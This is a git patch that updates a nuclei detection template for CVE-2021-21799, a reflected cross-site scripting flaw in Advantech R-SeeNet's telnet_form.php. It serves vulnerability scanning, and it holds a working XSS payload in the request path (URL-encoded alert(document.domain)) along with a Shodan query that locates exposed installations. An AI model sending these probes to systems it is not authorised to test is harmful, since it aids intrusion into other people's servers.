From 8473548be8452530760fca04728e326014d7b26e Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Fri, 5 Aug 2022 11:36:50 +0530
Subject: [PATCH] Update CVE-2021-21799.yaml

---
 cves/2021/CVE-2021-21799.yaml | 11 ++++++-----
 1 file changed, 6 insertions(+), 5 deletions(-)

diff --git a/cves/2021/CVE-2021-21799.yaml b/cves/2021/CVE-2021-21799.yaml
index ec99c061ae..b33cf994f4 100644
--- a/cves/2021/CVE-2021-21799.yaml
+++ b/cves/2021/CVE-2021-21799.yaml
@@ -7,24 +7,25 @@ info:
   description: |
     Advantech R-SeeNet v 2.4.12 is vulnerable to Refleced Cross Site Scripting in the telnet_form.php script functionality.
   reference:
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21799
     - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1270
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21799
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-21799
   metadata:
-    shodan-query: http.html:"R-SeeNet"
     verified: "true"
-  tags: xss,cve,2021,unauthenticated
+    shodan-query: http.html:"R-SeeNet"
+  tags: cve,cve2021,xss
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/php/telnet_form.php?hostname=</title><script>alert(1)</script><title>"
+      - "{{BaseURL}}/php/telnet_form.php?hostname=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctitle%3E"
 
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - '<script>alert(1)</script>'
+          - '<title>Telnet </title><script>alert(document.domain)</script><title>'
 
       - type: word
         part: header